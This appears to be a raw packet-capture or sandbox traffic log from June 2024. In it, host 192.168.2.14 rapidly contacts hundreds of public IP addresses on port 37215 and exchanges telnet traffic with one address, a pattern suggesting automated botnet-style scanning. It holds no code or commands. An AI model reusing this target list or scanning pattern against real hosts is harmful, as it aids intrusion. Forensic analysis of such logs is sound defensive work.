                                            Jun 14, 2024 10:43:33.657625914 CEST661137215192.168.2.14197.74.88.212
                                            Jun 14, 2024 10:43:33.657627106 CEST661137215192.168.2.14197.177.209.218
                                            Jun 14, 2024 10:43:33.657633066 CEST372156611197.2.165.202192.168.2.14
                                            Jun 14, 2024 10:43:33.657649040 CEST372156611197.0.186.164192.168.2.14
                                            Jun 14, 2024 10:43:33.657660007 CEST372156611197.168.230.94192.168.2.14
                                            Jun 14, 2024 10:43:33.657668114 CEST37215661141.240.193.167192.168.2.14
                                            Jun 14, 2024 10:43:33.657670021 CEST661137215192.168.2.14197.83.91.62
                                            Jun 14, 2024 10:43:33.657670021 CEST661137215192.168.2.14197.2.165.202
                                            Jun 14, 2024 10:43:33.657675982 CEST372156611156.155.120.11192.168.2.14
                                            Jun 14, 2024 10:43:33.657685041 CEST37215661141.225.163.169192.168.2.14
                                            Jun 14, 2024 10:43:33.657696009 CEST661137215192.168.2.14197.0.186.164
                                            Jun 14, 2024 10:43:33.657701015 CEST372156611197.179.50.236192.168.2.14
                                            Jun 14, 2024 10:43:33.657702923 CEST661137215192.168.2.14197.168.230.94
                                            Jun 14, 2024 10:43:33.657705069 CEST661137215192.168.2.1441.240.193.167
                                            Jun 14, 2024 10:43:33.657710075 CEST372156611197.237.52.108192.168.2.14
                                            Jun 14, 2024 10:43:33.657716036 CEST661137215192.168.2.14156.155.120.11
                                            Jun 14, 2024 10:43:33.657722950 CEST661137215192.168.2.1441.225.163.169
                                            Jun 14, 2024 10:43:33.657731056 CEST372156611197.95.168.17192.168.2.14
                                            Jun 14, 2024 10:43:33.657737970 CEST661137215192.168.2.14197.237.52.108
                                            Jun 14, 2024 10:43:33.657740116 CEST661137215192.168.2.14197.179.50.236
                                            Jun 14, 2024 10:43:33.657741070 CEST372156611197.1.119.158192.168.2.14
                                            Jun 14, 2024 10:43:33.657749891 CEST37215661141.16.196.29192.168.2.14
                                            Jun 14, 2024 10:43:33.657757044 CEST372156611197.228.135.200192.168.2.14
                                            Jun 14, 2024 10:43:33.657764912 CEST372156611156.108.163.128192.168.2.14
                                            Jun 14, 2024 10:43:33.657772064 CEST661137215192.168.2.14197.1.119.158
                                            Jun 14, 2024 10:43:33.657773972 CEST372156611156.109.221.51192.168.2.14
                                            Jun 14, 2024 10:43:33.657773972 CEST661137215192.168.2.14197.95.168.17
                                            Jun 14, 2024 10:43:33.657777071 CEST661137215192.168.2.1441.16.196.29
                                            Jun 14, 2024 10:43:33.657798052 CEST37215661141.148.2.72192.168.2.14
                                            Jun 14, 2024 10:43:33.657799959 CEST661137215192.168.2.14197.228.135.200
                                            Jun 14, 2024 10:43:33.657805920 CEST372156611197.142.78.120192.168.2.14
                                            Jun 14, 2024 10:43:33.657809973 CEST661137215192.168.2.14156.108.163.128
                                            Jun 14, 2024 10:43:33.657809973 CEST661137215192.168.2.14156.109.221.51
                                            Jun 14, 2024 10:43:33.657814026 CEST372156611197.136.147.208192.168.2.14
                                            Jun 14, 2024 10:43:33.657821894 CEST37215661141.51.128.17192.168.2.14
                                            Jun 14, 2024 10:43:33.657830000 CEST37215661141.39.58.194192.168.2.14
                                            Jun 14, 2024 10:43:33.657836914 CEST372156611156.150.195.18192.168.2.14
                                            Jun 14, 2024 10:43:33.657836914 CEST661137215192.168.2.1441.148.2.72
                                            Jun 14, 2024 10:43:33.657836914 CEST661137215192.168.2.14197.142.78.120
                                            Jun 14, 2024 10:43:33.657836914 CEST661137215192.168.2.14197.136.147.208
                                            Jun 14, 2024 10:43:33.657851934 CEST661137215192.168.2.1441.51.128.17
                                            Jun 14, 2024 10:43:33.657851934 CEST37215661141.96.223.152192.168.2.14
                                            Jun 14, 2024 10:43:33.657852888 CEST661137215192.168.2.1441.39.58.194
                                            Jun 14, 2024 10:43:33.657871962 CEST661137215192.168.2.14156.150.195.18
                                            Jun 14, 2024 10:43:33.657892942 CEST661137215192.168.2.1441.96.223.152
                                            Jun 14, 2024 10:43:33.668641090 CEST4961023192.168.2.1443.231.232.101
                                            Jun 14, 2024 10:43:33.673429012 CEST234961043.231.232.101192.168.2.14
                                            Jun 14, 2024 10:43:33.673481941 CEST4961023192.168.2.1443.231.232.101
                                            Jun 14, 2024 10:43:33.673511982 CEST4961023192.168.2.1443.231.232.101
                                            Jun 14, 2024 10:43:33.678364992 CEST234961043.231.232.101192.168.2.14
                                            Jun 14, 2024 10:43:33.678373098 CEST234961043.231.232.101192.168.2.14
                                            Jun 14, 2024 10:43:33.798173904 CEST4961223192.168.2.1443.231.232.101
                                            Jun 14, 2024 10:43:33.803050995 CEST234961243.231.232.101192.168.2.14
                                            Jun 14, 2024 10:43:33.803101063 CEST4961223192.168.2.1443.231.232.101
                                            Jun 14, 2024 10:43:33.803136110 CEST4961223192.168.2.1443.231.232.101
                                            Jun 14, 2024 10:43:33.807946920 CEST234961243.231.232.101192.168.2.14
                                            Jun 14, 2024 10:43:34.371586084 CEST234961243.231.232.101192.168.2.14
                                            Jun 14, 2024 10:43:34.371756077 CEST4961223192.168.2.1443.231.232.101
                                            Jun 14, 2024 10:43:34.413706064 CEST234961243.231.232.101192.168.2.14
                                            Jun 14, 2024 10:43:34.413866043 CEST4961223192.168.2.1443.231.232.101
                                            Jun 14, 2024 10:43:34.419971943 CEST234961243.231.232.101192.168.2.14
                                            Jun 14, 2024 10:43:34.652518988 CEST661137215192.168.2.14156.53.22.9
                                            Jun 14, 2024 10:43:34.652520895 CEST661137215192.168.2.1441.25.194.157
                                            Jun 14, 2024 10:43:34.652529001 CEST661137215192.168.2.14197.194.230.150
                                            Jun 14, 2024 10:43:34.652545929 CEST661137215192.168.2.14197.106.55.40
                                            Jun 14, 2024 10:43:34.652561903 CEST661137215192.168.2.14156.214.90.252
                                            Jun 14, 2024 10:43:34.652564049 CEST661137215192.168.2.1441.104.63.204
                                            Jun 14, 2024 10:43:34.652561903 CEST661137215192.168.2.1441.86.98.227
                                            Jun 14, 2024 10:43:34.652564049 CEST661137215192.168.2.14156.112.245.228
                                            Jun 14, 2024 10:43:34.652564049 CEST661137215192.168.2.14156.121.47.77
                                            Jun 14, 2024 10:43:34.652570009 CEST661137215192.168.2.14156.95.138.20
                                            Jun 14, 2024 10:43:34.652570009 CEST661137215192.168.2.1441.62.49.215
                                            Jun 14, 2024 10:43:34.652561903 CEST661137215192.168.2.1441.166.206.128
                                            Jun 14, 2024 10:43:34.652561903 CEST661137215192.168.2.14197.224.71.250
                                            Jun 14, 2024 10:43:34.652561903 CEST661137215192.168.2.14156.63.87.91
                                            Jun 14, 2024 10:43:34.652570963 CEST661137215192.168.2.14156.239.255.247
                                            Jun 14, 2024 10:43:34.652571917 CEST661137215192.168.2.1441.110.47.52
                                            Jun 14, 2024 10:43:34.652571917 CEST661137215192.168.2.14197.140.97.38
                                            Jun 14, 2024 10:43:34.652573109 CEST661137215192.168.2.14156.122.69.214
                                            Jun 14, 2024 10:43:34.652570963 CEST661137215192.168.2.14156.205.28.154
                                            Jun 14, 2024 10:43:34.652570963 CEST661137215192.168.2.14197.111.198.15
                                            Jun 14, 2024 10:43:34.652570963 CEST661137215192.168.2.1441.160.104.107
                                            Jun 14, 2024 10:43:34.652575970 CEST661137215192.168.2.14156.150.23.167
                                            Jun 14, 2024 10:43:34.652575970 CEST661137215192.168.2.14197.163.24.189
                                            Jun 14, 2024 10:43:34.652575970 CEST661137215192.168.2.14197.161.54.138
                                            Jun 14, 2024 10:43:34.652592897 CEST661137215192.168.2.14197.179.252.52
                                            Jun 14, 2024 10:43:34.652601957 CEST661137215192.168.2.14197.1.109.2
                                            Jun 14, 2024 10:43:34.652602911 CEST661137215192.168.2.1441.120.37.38
                                            Jun 14, 2024 10:43:34.652607918 CEST661137215192.168.2.14156.10.31.90
                                            Jun 14, 2024 10:43:34.652607918 CEST661137215192.168.2.14197.37.227.10
                                            Jun 14, 2024 10:43:34.652607918 CEST661137215192.168.2.14156.197.102.147
                                            Jun 14, 2024 10:43:34.652607918 CEST661137215192.168.2.14156.74.213.254
                                            Jun 14, 2024 10:43:34.652607918 CEST661137215192.168.2.14156.244.35.41
                                            Jun 14, 2024 10:43:34.652607918 CEST661137215192.168.2.1441.206.192.149
                                            Jun 14, 2024 10:43:34.652607918 CEST661137215192.168.2.14197.89.135.49
                                            Jun 14, 2024 10:43:34.652616024 CEST661137215192.168.2.1441.65.170.88
                                            Jun 14, 2024 10:43:34.652620077 CEST661137215192.168.2.14156.53.176.64
                                            Jun 14, 2024 10:43:34.652621031 CEST661137215192.168.2.14197.103.242.137
                                            Jun 14, 2024 10:43:34.652636051 CEST661137215192.168.2.14156.13.235.110
                                            Jun 14, 2024 10:43:34.652636051 CEST661137215192.168.2.14156.191.32.118
                                            Jun 14, 2024 10:43:34.652636051 CEST661137215192.168.2.14197.204.206.168
                                            Jun 14, 2024 10:43:34.652637005 CEST661137215192.168.2.14156.208.30.243
                                            Jun 14, 2024 10:43:34.652637959 CEST661137215192.168.2.14156.51.70.118
                                            Jun 14, 2024 10:43:34.652638912 CEST661137215192.168.2.14197.171.154.221
                                            Jun 14, 2024 10:43:34.652647018 CEST661137215192.168.2.14197.181.204.177
                                            Jun 14, 2024 10:43:34.652651072 CEST661137215192.168.2.1441.123.150.169
                                            Jun 14, 2024 10:43:34.652658939 CEST661137215192.168.2.14156.107.88.231
                                            Jun 14, 2024 10:43:34.652661085 CEST661137215192.168.2.1441.196.43.135
                                            Jun 14, 2024 10:43:34.652661085 CEST661137215192.168.2.14197.247.234.164
                                            Jun 14, 2024 10:43:34.652662992 CEST661137215192.168.2.14197.124.193.114
                                            Jun 14, 2024 10:43:34.652662992 CEST661137215192.168.2.14156.240.150.152
                                            Jun 14, 2024 10:43:34.652662992 CEST661137215192.168.2.1441.166.144.123
                                            Jun 14, 2024 10:43:34.652667046 CEST661137215192.168.2.1441.50.115.50
                                            Jun 14, 2024 10:43:34.652667046 CEST661137215192.168.2.14197.233.30.78
                                            Jun 14, 2024 10:43:34.652673960 CEST661137215192.168.2.14156.83.181.66
                                            Jun 14, 2024 10:43:34.652674913 CEST661137215192.168.2.14156.41.202.156
                                            Jun 14, 2024 10:43:34.652674913 CEST661137215192.168.2.1441.212.57.218
                                            Jun 14, 2024 10:43:34.652679920 CEST661137215192.168.2.14156.240.149.252
                                            Jun 14, 2024 10:43:34.652679920 CEST661137215192.168.2.14197.240.94.26
                                            Jun 14, 2024 10:43:34.652684927 CEST661137215192.168.2.14197.75.24.151
                                            Jun 14, 2024 10:43:34.652689934 CEST661137215192.168.2.14197.50.119.185
                                            Jun 14, 2024 10:43:34.652704000 CEST661137215192.168.2.14156.231.176.148
                                            Jun 14, 2024 10:43:34.652704954 CEST661137215192.168.2.14197.191.254.222
                                            Jun 14, 2024 10:43:34.652705908 CEST661137215192.168.2.14156.70.154.169
                                            Jun 14, 2024 10:43:34.652705908 CEST661137215192.168.2.1441.235.122.116
                                            Jun 14, 2024 10:43:34.652714014 CEST661137215192.168.2.1441.45.227.75
                                            Jun 14, 2024 10:43:34.652714014 CEST661137215192.168.2.14197.73.108.89
                                            Jun 14, 2024 10:43:34.652715921 CEST661137215192.168.2.1441.179.99.27
                                            Jun 14, 2024 10:43:34.652714014 CEST661137215192.168.2.14156.13.174.42
                                            Jun 14, 2024 10:43:34.652723074 CEST661137215192.168.2.14156.23.36.202
                                            Jun 14, 2024 10:43:34.652724028 CEST661137215192.168.2.14156.5.148.55
                                            Jun 14, 2024 10:43:34.652726889 CEST661137215192.168.2.14197.204.104.152
                                            Jun 14, 2024 10:43:34.652726889 CEST661137215192.168.2.14197.219.159.225
                                            Jun 14, 2024 10:43:34.652729034 CEST661137215192.168.2.1441.131.141.169
                                            Jun 14, 2024 10:43:34.652729034 CEST661137215192.168.2.14156.16.48.219
                                            Jun 14, 2024 10:43:34.652736902 CEST661137215192.168.2.14156.128.6.30
                                            Jun 14, 2024 10:43:34.652736902 CEST661137215192.168.2.14197.164.21.89
                                            Jun 14, 2024 10:43:34.652736902 CEST661137215192.168.2.14197.199.119.15
                                            Jun 14, 2024 10:43:34.652739048 CEST661137215192.168.2.14197.73.253.240
                                            Jun 14, 2024 10:43:34.652739048 CEST661137215192.168.2.1441.10.51.214
                                            Jun 14, 2024 10:43:34.652740002 CEST661137215192.168.2.14197.48.52.114
                                            Jun 14, 2024 10:43:34.652745008 CEST661137215192.168.2.14156.198.108.43
                                            Jun 14, 2024 10:43:34.652746916 CEST661137215192.168.2.14197.136.204.131
                                            Jun 14, 2024 10:43:34.652748108 CEST661137215192.168.2.14197.199.204.23
                                            Jun 14, 2024 10:43:34.652746916 CEST661137215192.168.2.14156.172.161.20
                                            Jun 14, 2024 10:43:34.652757883 CEST661137215192.168.2.14197.93.232.37
                                            Jun 14, 2024 10:43:34.652766943 CEST661137215192.168.2.1441.231.252.57
                                            Jun 14, 2024 10:43:34.652766943 CEST661137215192.168.2.14156.107.197.217
                                            Jun 14, 2024 10:43:34.652766943 CEST661137215192.168.2.14197.20.145.2
                                            Jun 14, 2024 10:43:34.652779102 CEST661137215192.168.2.1441.69.232.152
                                            Jun 14, 2024 10:43:34.652781010 CEST661137215192.168.2.14156.104.167.238
                                            Jun 14, 2024 10:43:34.652781010 CEST661137215192.168.2.14156.33.12.217
                                            Jun 14, 2024 10:43:34.652781010 CEST661137215192.168.2.1441.23.70.120
                                            Jun 14, 2024 10:43:34.652781010 CEST661137215192.168.2.1441.33.158.140
                                            Jun 14, 2024 10:43:34.652784109 CEST661137215192.168.2.14156.195.39.227
                                            Jun 14, 2024 10:43:34.652795076 CEST661137215192.168.2.1441.211.18.138
                                            Jun 14, 2024 10:43:34.652796030 CEST661137215192.168.2.14197.123.248.96
                                            Jun 14, 2024 10:43:34.652800083 CEST661137215192.168.2.14197.210.203.172
                                            Jun 14, 2024 10:43:34.652800083 CEST661137215192.168.2.1441.101.109.70
                                            Jun 14, 2024 10:43:34.652808905 CEST661137215192.168.2.14197.129.91.168
                                            Jun 14, 2024 10:43:34.652808905 CEST661137215192.168.2.14197.150.58.36
                                            Jun 14, 2024 10:43:34.652808905 CEST661137215192.168.2.14156.41.216.245
                                            Jun 14, 2024 10:43:34.652808905 CEST661137215192.168.2.14156.120.101.64
                                            Jun 14, 2024 10:43:34.652828932 CEST661137215192.168.2.14197.244.234.190
                                            Jun 14, 2024 10:43:34.652829885 CEST661137215192.168.2.14156.36.96.143
                                            Jun 14, 2024 10:43:34.652832985 CEST661137215192.168.2.14197.63.157.30
                                            Jun 14, 2024 10:43:34.652836084 CEST661137215192.168.2.14197.229.242.241
                                            Jun 14, 2024 10:43:34.652836084 CEST661137215192.168.2.14197.86.144.0
                                            Jun 14, 2024 10:43:34.652836084 CEST661137215192.168.2.14156.212.2.191
                                            Jun 14, 2024 10:43:34.652839899 CEST661137215192.168.2.14197.142.240.129
                                            Jun 14, 2024 10:43:34.652841091 CEST661137215192.168.2.14197.195.76.22
                                            Jun 14, 2024 10:43:34.652839899 CEST661137215192.168.2.1441.55.199.105
                                            Jun 14, 2024 10:43:34.652868986 CEST661137215192.168.2.14156.49.114.156
                                            Jun 14, 2024 10:43:34.652868986 CEST661137215192.168.2.14197.144.100.35
                                            Jun 14, 2024 10:43:34.652872086 CEST661137215192.168.2.14156.202.207.179
                                            Jun 14, 2024 10:43:34.652873039 CEST661137215192.168.2.14156.76.85.59
                                            Jun 14, 2024 10:43:34.652873039 CEST661137215192.168.2.14197.78.150.11
                                            Jun 14, 2024 10:43:34.652879000 CEST661137215192.168.2.14197.50.232.201
                                            Jun 14, 2024 10:43:34.652884007 CEST661137215192.168.2.14197.86.48.145
                                            Jun 14, 2024 10:43:34.652884960 CEST661137215192.168.2.14197.255.122.101
                                            Jun 14, 2024 10:43:34.652884960 CEST661137215192.168.2.14156.237.109.76
                                            Jun 14, 2024 10:43:34.652884960 CEST661137215192.168.2.14197.15.233.38
                                            Jun 14, 2024 10:43:34.652884960 CEST661137215192.168.2.1441.237.145.22
                                            Jun 14, 2024 10:43:34.652889967 CEST661137215192.168.2.14197.152.249.204
                                            Jun 14, 2024 10:43:34.652889967 CEST661137215192.168.2.14197.107.104.42
                                            Jun 14, 2024 10:43:34.652890921 CEST661137215192.168.2.1441.127.142.60
                                            Jun 14, 2024 10:43:34.652890921 CEST661137215192.168.2.14197.16.96.59
                                            Jun 14, 2024 10:43:34.652890921 CEST661137215192.168.2.14197.42.14.45
                                            Jun 14, 2024 10:43:34.652894020 CEST661137215192.168.2.14156.115.89.207
                                            Jun 14, 2024 10:43:34.652896881 CEST661137215192.168.2.14197.61.126.76
                                            Jun 14, 2024 10:43:34.652896881 CEST661137215192.168.2.1441.159.31.34
                                            Jun 14, 2024 10:43:34.652899981 CEST661137215192.168.2.14156.87.220.158
                                            Jun 14, 2024 10:43:34.652904987 CEST661137215192.168.2.1441.148.94.219
                                            Jun 14, 2024 10:43:34.652911901 CEST661137215192.168.2.14156.95.188.32
                                            Jun 14, 2024 10:43:34.652913094 CEST661137215192.168.2.14156.181.84.194
                                            Jun 14, 2024 10:43:34.652915001 CEST661137215192.168.2.14156.230.56.126
                                            Jun 14, 2024 10:43:34.652915001 CEST661137215192.168.2.14197.173.194.201
                                            Jun 14, 2024 10:43:34.652919054 CEST661137215192.168.2.14156.254.255.12
                                            Jun 14, 2024 10:43:34.652919054 CEST661137215192.168.2.1441.3.221.145
                                            Jun 14, 2024 10:43:34.652919054 CEST661137215192.168.2.14197.3.132.219
                                            Jun 14, 2024 10:43:34.652920961 CEST661137215192.168.2.1441.92.62.246
                                            Jun 14, 2024 10:43:34.652935028 CEST661137215192.168.2.14197.79.30.8
                                            Jun 14, 2024 10:43:34.652940989 CEST661137215192.168.2.14197.146.24.147
                                            Jun 14, 2024 10:43:34.652949095 CEST661137215192.168.2.14197.74.73.156
                                            Jun 14, 2024 10:43:34.652950048 CEST661137215192.168.2.1441.9.242.9
                                            Jun 14, 2024 10:43:34.652950048 CEST661137215192.168.2.14197.242.62.181
                                            Jun 14, 2024 10:43:34.652951002 CEST661137215192.168.2.14156.128.98.241
                                            Jun 14, 2024 10:43:34.652952909 CEST661137215192.168.2.14197.11.214.222
                                            Jun 14, 2024 10:43:34.652951002 CEST661137215192.168.2.14197.99.61.27
                                            Jun 14, 2024 10:43:34.652961016 CEST661137215192.168.2.1441.180.19.47
                                            Jun 14, 2024 10:43:34.652961016 CEST661137215192.168.2.14156.230.236.158
                                            Jun 14, 2024 10:43:34.652962923 CEST661137215192.168.2.14156.242.101.133
                                            Jun 14, 2024 10:43:34.652962923 CEST661137215192.168.2.14197.172.65.104
                                            Jun 14, 2024 10:43:34.652967930 CEST661137215192.168.2.14197.157.144.29
                                            Jun 14, 2024 10:43:34.652971029 CEST661137215192.168.2.1441.137.106.91
                                            Jun 14, 2024 10:43:34.652971983 CEST661137215192.168.2.14197.114.97.36
                                            Jun 14, 2024 10:43:34.652971983 CEST661137215192.168.2.14197.115.0.107
                                            Jun 14, 2024 10:43:34.652976990 CEST661137215192.168.2.14197.165.22.32
                                            Jun 14, 2024 10:43:34.652997017 CEST661137215192.168.2.14197.240.2.210
                                            Jun 14, 2024 10:43:34.652997017 CEST661137215192.168.2.1441.99.251.245
                                            Jun 14, 2024 10:43:34.653067112 CEST661137215192.168.2.14156.86.255.150
                                            Jun 14, 2024 10:43:34.653069019 CEST4215237215192.168.2.14156.47.96.254
                                            Jun 14, 2024 10:43:34.653090000 CEST4176637215192.168.2.1441.60.152.249
                                            Jun 14, 2024 10:43:34.653093100 CEST3856837215192.168.2.1441.245.235.255
                                            Jun 14, 2024 10:43:34.653107882 CEST4430837215192.168.2.14156.224.103.158
                                            Jun 14, 2024 10:43:34.653110027 CEST4839037215192.168.2.14197.207.188.68
                                            Jun 14, 2024 10:43:34.653110981 CEST3353437215192.168.2.1441.131.181.63
                                            Jun 14, 2024 10:43:34.653136969 CEST5145637215192.168.2.1441.78.102.254
                                            Jun 14, 2024 10:43:34.653151989 CEST4824237215192.168.2.1441.211.225.173
                                            Jun 14, 2024 10:43:34.653192043 CEST4809237215192.168.2.14197.156.162.157
                                            Jun 14, 2024 10:43:34.653192997 CEST4271437215192.168.2.1441.187.63.243
                                            Jun 14, 2024 10:43:34.653208017 CEST4495037215192.168.2.1441.203.38.182
                                            Jun 14, 2024 10:43:34.653213978 CEST5225437215192.168.2.1441.96.243.63
                                            Jun 14, 2024 10:43:34.653230906 CEST4622437215192.168.2.14197.145.0.42
                                            Jun 14, 2024 10:43:34.653237104 CEST3643237215192.168.2.1441.182.182.25
                                            Jun 14, 2024 10:43:34.653243065 CEST3801437215192.168.2.14197.30.81.14
                                            Jun 14, 2024 10:43:34.653266907 CEST5111637215192.168.2.14197.115.91.80
                                            Jun 14, 2024 10:43:34.653290987 CEST4479637215192.168.2.1441.85.57.174
                                            Jun 14, 2024 10:43:34.653291941 CEST5663437215192.168.2.14156.149.180.35
                                            Jun 14, 2024 10:43:34.653295040 CEST3433437215192.168.2.14156.67.95.193
                                            Jun 14, 2024 10:43:34.653323889 CEST4482637215192.168.2.1441.229.152.150
                                            Jun 14, 2024 10:43:34.653337955 CEST4869837215192.168.2.14156.81.56.92
                                            Jun 14, 2024 10:43:34.653351068 CEST5398437215192.168.2.1441.20.102.108
                                            Jun 14, 2024 10:43:34.653352022 CEST4020037215192.168.2.14197.92.82.210
                                            Jun 14, 2024 10:43:34.653367043 CEST5318637215192.168.2.1441.68.188.191
                                            Jun 14, 2024 10:43:34.653367043 CEST4598637215192.168.2.14156.97.90.225
                                            Jun 14, 2024 10:43:34.653384924 CEST5252637215192.168.2.1441.174.190.39
                                            Jun 14, 2024 10:43:34.653409958 CEST4809437215192.168.2.1441.172.240.153
                                            Jun 14, 2024 10:43:34.653409958 CEST4626437215192.168.2.1441.38.84.36
                                            Jun 14, 2024 10:43:34.653412104 CEST4830837215192.168.2.14197.82.207.29
                                            Jun 14, 2024 10:43:34.653420925 CEST5262837215192.168.2.14156.188.227.67
                                            Jun 14, 2024 10:43:34.653428078 CEST4215037215192.168.2.1441.146.247.111
                                            Jun 14, 2024 10:43:34.653428078 CEST5911237215192.168.2.14197.12.163.24
                                            Jun 14, 2024 10:43:34.653449059 CEST6018637215192.168.2.14156.36.89.39
                                            Jun 14, 2024 10:43:34.653450012 CEST5092037215192.168.2.1441.156.92.120
                                            Jun 14, 2024 10:43:34.653451920 CEST3598837215192.168.2.1441.216.220.242
                                            Jun 14, 2024 10:43:34.653460026 CEST5496637215192.168.2.1441.145.71.139
                                            Jun 14, 2024 10:43:34.653485060 CEST3810437215192.168.2.1441.198.161.145
                                            Jun 14, 2024 10:43:34.653489113 CEST3396637215192.168.2.1441.17.142.44
                                            Jun 14, 2024 10:43:34.653500080 CEST3503837215192.168.2.1441.83.153.150
                                            Jun 14, 2024 10:43:34.653522968 CEST5703437215192.168.2.14197.224.78.64
                                            Jun 14, 2024 10:43:34.653522968 CEST5198037215192.168.2.1441.161.125.211
                                            Jun 14, 2024 10:43:34.653526068 CEST3793637215192.168.2.14197.45.165.234
                                            Jun 14, 2024 10:43:34.653526068 CEST5521037215192.168.2.1441.21.0.89
                                            Jun 14, 2024 10:43:34.653549910 CEST4673037215192.168.2.14156.44.219.206
                                            Jun 14, 2024 10:43:34.653551102 CEST5578237215192.168.2.14197.172.100.117
                                            Jun 14, 2024 10:43:34.653553963 CEST5151237215192.168.2.1441.17.37.241
                                            Jun 14, 2024 10:43:34.653565884 CEST3939237215192.168.2.14156.70.90.47
                                            Jun 14, 2024 10:43:34.653570890 CEST4543837215192.168.2.1441.103.250.3
                                            Jun 14, 2024 10:43:34.653584003 CEST5142437215192.168.2.14156.92.179.212
                                            Jun 14, 2024 10:43:34.653592110 CEST4917637215192.168.2.14156.75.157.213
                                            Jun 14, 2024 10:43:34.653616905 CEST4627437215192.168.2.14197.143.65.56
                                            Jun 14, 2024 10:43:34.653635025 CEST5295237215192.168.2.14197.33.230.71
                                            Jun 14, 2024 10:43:34.653636932 CEST3574037215192.168.2.1441.48.170.201
                                            Jun 14, 2024 10:43:34.653647900 CEST5855437215192.168.2.14156.129.96.206
                                            Jun 14, 2024 10:43:34.653656960 CEST5048837215192.168.2.14197.1.228.185
                                            Jun 14, 2024 10:43:34.653657913 CEST3774837215192.168.2.1441.229.62.31
                                            Jun 14, 2024 10:43:34.653659105 CEST4697037215192.168.2.14156.54.177.90
                                            Jun 14, 2024 10:43:34.653659105 CEST3289437215192.168.2.1441.153.119.111
                                            Jun 14, 2024 10:43:34.653659105 CEST4791037215192.168.2.1441.181.77.39
                                            Jun 14, 2024 10:43:34.653676987 CEST3562437215192.168.2.14156.159.166.61
                                            Jun 14, 2024 10:43:34.653681993 CEST4975237215192.168.2.14197.165.171.189
                                            Jun 14, 2024 10:43:34.653701067 CEST3315037215192.168.2.1441.211.139.167
                                            Jun 14, 2024 10:43:34.653702021 CEST5081637215192.168.2.1441.162.173.241
                                            Jun 14, 2024 10:43:34.653723001 CEST5192037215192.168.2.1441.65.197.2
                                            Jun 14, 2024 10:43:34.653723001 CEST3855637215192.168.2.14156.131.196.119
                                            Jun 14, 2024 10:43:34.653753996 CEST3374837215192.168.2.14156.124.39.243
                                            Jun 14, 2024 10:43:34.653754950 CEST4120837215192.168.2.14197.244.221.110
                                            Jun 14, 2024 10:43:34.653754950 CEST5764837215192.168.2.1441.31.120.95
                                            Jun 14, 2024 10:43:34.653773069 CEST6011237215192.168.2.1441.68.4.247
                                            Jun 14, 2024 10:43:34.653775930 CEST5452237215192.168.2.14156.231.88.25
                                            Jun 14, 2024 10:43:34.653800011 CEST4712437215192.168.2.14197.106.253.26
                                            Jun 14, 2024 10:43:34.653805971 CEST3794637215192.168.2.1441.150.152.40
                                            Jun 14, 2024 10:43:34.653810978 CEST5895037215192.168.2.1441.73.147.202
                                            Jun 14, 2024 10:43:34.653820038 CEST5615237215192.168.2.1441.137.12.98
                                            Jun 14, 2024 10:43:34.653837919 CEST5357237215192.168.2.14156.251.163.18
                                            Jun 14, 2024 10:43:34.653851986 CEST5360237215192.168.2.14156.72.192.166
                                            Jun 14, 2024 10:43:34.653877020 CEST4319637215192.168.2.1441.83.251.197
                                            Jun 14, 2024 10:43:34.653877974 CEST5305837215192.168.2.14156.173.40.172
                                            Jun 14, 2024 10:43:34.653882980 CEST4051837215192.168.2.14156.59.39.131
                                            Jun 14, 2024 10:43:34.653884888 CEST4651037215192.168.2.14197.208.58.206
                                            Jun 14, 2024 10:43:34.653902054 CEST5666037215192.168.2.1441.76.10.213
                                            Jun 14, 2024 10:43:34.653917074 CEST4738437215192.168.2.1441.172.243.251
                                            Jun 14, 2024 10:43:34.653934956 CEST4758237215192.168.2.1441.49.177.241
                                            Jun 14, 2024 10:43:34.653945923 CEST4853237215192.168.2.1441.162.130.70
                                            Jun 14, 2024 10:43:34.653947115 CEST5819037215192.168.2.14197.160.6.126
                                            Jun 14, 2024 10:43:34.653984070 CEST5863237215192.168.2.14197.96.60.42
                                            Jun 14, 2024 10:43:34.653984070 CEST5697037215192.168.2.14156.17.229.84
                                            Jun 14, 2024 10:43:34.653984070 CEST3735837215192.168.2.1441.86.97.148
                                            Jun 14, 2024 10:43:34.653986931 CEST3676037215192.168.2.14156.184.162.68
                                            Jun 14, 2024 10:43:34.653986931 CEST4258437215192.168.2.14156.45.119.80
                                            Jun 14, 2024 10:43:34.653986931 CEST5422437215192.168.2.14156.83.228.55
                                            Jun 14, 2024 10:43:34.654011011 CEST4815837215192.168.2.14156.99.70.130
                                            Jun 14, 2024 10:43:34.654012918 CEST5860837215192.168.2.1441.135.86.170
                                            Jun 14, 2024 10:43:34.654038906 CEST4260437215192.168.2.1441.219.214.89
                                            Jun 14, 2024 10:43:34.654042006 CEST5499237215192.168.2.14197.147.108.144
                                            Jun 14, 2024 10:43:34.654042006 CEST4243637215192.168.2.14197.42.188.77
                                            Jun 14, 2024 10:43:34.654088020 CEST4783237215192.168.2.1441.14.203.251
                                            Jun 14, 2024 10:43:34.654102087 CEST5327437215192.168.2.1441.32.235.166
                                            Jun 14, 2024 10:43:34.654102087 CEST3502637215192.168.2.14197.2.201.17
                                            Jun 14, 2024 10:43:34.654103994 CEST5534437215192.168.2.14156.169.159.36
                                            Jun 14, 2024 10:43:34.654105902 CEST3421237215192.168.2.14156.219.247.62
                                            Jun 14, 2024 10:43:34.654105902 CEST4658637215192.168.2.1441.59.10.212
                                            Jun 14, 2024 10:43:34.654112101 CEST5252037215192.168.2.1441.169.58.138
                                            Jun 14, 2024 10:43:34.654118061 CEST5823437215192.168.2.1441.129.130.21
                                            Jun 14, 2024 10:43:34.654134989 CEST3970037215192.168.2.14156.205.118.79
                                            Jun 14, 2024 10:43:34.654135942 CEST3916437215192.168.2.1441.180.54.14
                                            Jun 14, 2024 10:43:34.654144049 CEST4651637215192.168.2.1441.75.213.161
                                            Jun 14, 2024 10:43:34.654151917 CEST4468037215192.168.2.14156.60.18.213
                                            Jun 14, 2024 10:43:34.654151917 CEST5959037215192.168.2.14197.193.225.65
                                            Jun 14, 2024 10:43:34.654165983 CEST4823637215192.168.2.14156.235.113.156
                                            Jun 14, 2024 10:43:34.654165983 CEST4872037215192.168.2.14156.63.123.182
                                            Jun 14, 2024 10:43:34.654182911 CEST4437437215192.168.2.1441.150.127.110
                                            Jun 14, 2024 10:43:34.654207945 CEST4801637215192.168.2.14197.72.101.78
                                            Jun 14, 2024 10:43:34.654208899 CEST3853637215192.168.2.14197.164.90.89
                                            Jun 14, 2024 10:43:34.654222012 CEST3507437215192.168.2.1441.103.79.200
                                            Jun 14, 2024 10:43:34.654223919 CEST3987437215192.168.2.1441.221.245.45
                                            Jun 14, 2024 10:43:34.654223919 CEST4761637215192.168.2.14156.99.46.18
